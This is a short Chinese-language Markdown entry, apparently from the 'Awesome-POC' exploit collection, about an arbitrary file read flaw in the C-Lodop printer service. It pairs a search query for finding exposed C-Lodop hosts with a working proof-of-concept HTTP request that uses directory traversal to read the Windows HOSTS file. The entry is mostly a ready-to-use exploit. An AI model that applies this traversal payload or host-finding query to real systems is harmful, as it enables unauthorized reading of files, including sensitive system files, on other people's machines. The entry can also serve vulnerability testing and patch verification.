Awesome-POC/网络设备漏洞/C-Lodop打印机任意文件读取漏洞.md
2024-11-06 14:10:36 +08:00

23 lines
364 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# C-Lodop打印机任意文件读取漏洞
## 漏洞描述
C-Lodop打印机存在任意文件读取漏洞通过构造特殊URL可实现读取系统任意文件。
## 网络测绘
```
title="C-Lodop"
```
## 漏洞复现
poc
```
GET /../../../../../../../../windows/System32/drivers/etc/HOSTS HTTP/1.1
Host: 127.0.0.1
....
```